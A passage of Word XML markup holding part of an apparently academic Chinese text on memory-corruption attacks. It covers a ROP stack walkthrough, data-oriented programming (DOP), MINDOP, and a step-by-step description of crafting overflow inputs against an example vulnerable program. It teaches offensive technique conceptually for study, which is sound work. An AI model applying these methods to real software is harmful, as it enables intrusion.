          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ebx后，ebx=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；执行ret指令，返回到0xb880020处；执行add</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ebx，eax=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；执行ret指令，返回到</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>xb</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8800010</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；执行pop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ebx，ebx=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>00400000</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；执行ret指令，返回到0xb</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8800030</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>；执行mov</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> [ebx], eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，将3赋值到[</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0x00400000]</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>内存中。从以上例子可知，只要找到需要的代码片段，并精心构造栈空间的数据，就可以实现预期的计算。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F4CA9" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但要注意，上面的例子只是为了帮助理解ROP的过程，实际利用依然很复杂，0x00字节的出现会导致字符串截断，所以能填入栈空间的数据也是有限的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187CD094"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2.7.4 </w:t>
      </w:r>
      <w:r w:rsidRPr="000012A0">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075A87C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现有的利用内存破坏漏洞进行的攻击可以大致分为两类，包括控制流劫持攻击（Control-flow hijacking attack）和非控制性数据攻击（Non-control data attack）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。控制流劫持攻击，即通过缓冲区溢出的漏洞，将函数的返回地址覆盖为特定的代码块儿的地址，让程序不再按照原本的控制流执行下去，而是执行攻击者想要执行的代码，从而达到恶意目的的攻击方式。</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>由于针对控制流劫持攻击目前部署了许多防御措施，这种攻击已经变得越来越困难。相比之下，虽然后者已经被发现很久，但长久以来由其带来的威胁并没有得到充分的解决。与此同时，随着近几年新的非控制性数据攻击方式被提出，这种攻击手段已经具有了更强的攻击能力。非控制性数据攻击逐渐被认为是一种有吸引力的对包括新式的嵌入式系统在内的多数计算机系统构成危害的攻击技术。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3718624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已经被提出和应用的内存破坏漏洞防御手段，主要针对的是控制流劫持攻击。例如数据不可执行（Data Execute Prevention，DEP）、Canary、内存布局随机化、地址空间配置随机加载（Address space layout randomization，ASLR）和控制流完整性（Control-flow integrity，CFI）等，其主要防御思想是强制程序依照控制流运行或者提高攻击者构造恶意代码的难度。但在面对不改变程序控制流的非控制性数据攻击时，这些方法基本上难以奏效。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7EBDA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非控制性数据攻击与控制流劫持攻击不同，该攻击不要求攻击者通过覆盖函数返回地址、恶意修改内存中的代码区等方式实现对程序控制流的篡改，只对程序已有的运行时数据进行修改以达到攻击目的。研究界曾经广泛认为，非控制性数据攻击在最坏的情况下，只能对程序的部分数据进行篡改，干扰程序执行，无法劫持控制流，因而能够造成的危害很有限，对非控制性数据攻击的防御研究远不及针对控制流劫持攻击的防御研究广泛深入。但最近的研究已经证明，在特定的条件下，非控制性数据攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>具有图灵完备性，这极大地增加了这类攻击的潜在破坏能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423E2ED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随着“面向数据编程（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Data-oriented Programming，DOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）”等图灵完备的攻击手段被提出，非控制性数据攻击的危害性得以极大提高。DOP和ROP类似，也是要依赖于各种各样的gadgets，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在程序内存中执行图灵完备计算，这些指令序列是为了恶意目的而重新设计的。通常，这样一个简短的指令序列gadget由加载、存储和一些算术微操作组成。需要指出，此处的gadget与ROP中的gadget非常相似但存在不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6697EE6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（1）DOP的gadgets必须符合程序原本的CFG，不能发生非法的控制流转移，也正因为如此，DOP的gadgets一般不是连续的，而ROP的gadgets需要一个接一个的执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA0FE3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（2）ROP的gadgets可以使用寄存器来传递中间数据，但因为DOP的gadgets的不连续性，DOP只能使用内存传递结果，因为寄存器会被原本程序的计算频繁修改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544665CA" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="200" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为了更好的说明DOP的gadgets特性，胡宏等人定义了语言MINDOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，MINDOP有6个虚拟指令：算数/逻辑运算、赋值、加载、存储、条件跳转和无条件跳转。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBBEB7F"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1EACFD22" wp14:editId="6D77B1D4">
            <wp:extent cx="3898823" cy="1497850"/>
            <wp:effectExtent l="0" t="0" r="6985" b="762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32">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3916087" cy="1504482"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63463D4D" w14:textId="3A1C35BB"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.2</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MINDOP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AAAED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首先通过一个Linux系统下一个漏洞程序的DOP攻击示例来详细说明DOP的攻击过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6701DE85"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23EDFFDD" wp14:editId="7C7D7FD9">
            <wp:extent cx="4145654" cy="2375291"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635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33">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4155517" cy="2380942"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC2768C" w14:textId="702FFC29"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.2</w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有缓冲区溢出漏洞的程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384AB7B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如图所示，readData函数有缓冲区溢出漏洞，并且在栈空间中buf在局部变量的最低地址，即当发生缓冲区溢出时，其它的局部变量都可以被覆盖。现在，要用以上的漏洞代码片段模拟一个可以对一个链表中每一个元素增加特定值的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2576E609"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759E9B5E" wp14:editId="60BB68F2">
            <wp:extent cx="3938091" cy="892779"/>
            <wp:effectExtent l="0" t="0" r="5715" b="317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34">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4014551" cy="910113"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D63B917" w14:textId="259E1FF0"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w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>待模拟的函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C08EA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具体的攻击过程：进行两次循环，两次循环输入不同：其中p是目标链表的地址，q是addend的地址，m是字符串STREAM的地址，n是局部变量srv的地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E958E"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10B5F93D" wp14:editId="30274D29">
            <wp:extent cx="3758577" cy="1278351"/>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35">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3769618" cy="1282106"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C5B74" w14:textId="39CE0AFE"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w:t>
      </w:r>
      <w:r w:rsidR="00715DC2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>恶意输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD361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第一次输入通过缓冲区溢出将type覆盖为p，size覆盖为q，srv覆盖为n-8，connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>_limited</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>覆盖为一个可以使程序进入循环的值即可。根据*type的值，程序跳到第1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>行，srv-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>typ=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>type即为srv=*(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n-8+8)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p=list，运行srv</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;total</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+=</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>size，即为list的第二个成员加*size，就实现了list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;prop+=addend</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED054F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第二次输入type覆盖为m，size覆盖为p，srv覆盖为p。那么程序运行第1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>行代码时实际上是在运行list=list</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-&gt;next</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，依次重复这两个输入可以使得链表中所有的元素都加上addend，完成目标。在这一过程中，攻击者并没有修改函数返回地址导致控制流不完整。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0957537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在以上的攻击示例中有几个重要的部分：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762961E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（1）首先要有一个缓冲区溢出漏洞，其次这个缓冲区漏洞要在一个循环当中，循环的条件要可控制，这个循环就是dispatcher，它能够将让用户近乎无限次的调用gadgets。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9ECAA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（2）为了完成特定的功能，需要在不同时刻运行不同的gadgets，这就需要一个selector，也就是例子中的if判断语句，判断条件必须可控，根据用户输入的不同，程序会进入不同的分支，运行不同的gadgets。</w:t>
      </w:r>
    </w:p>
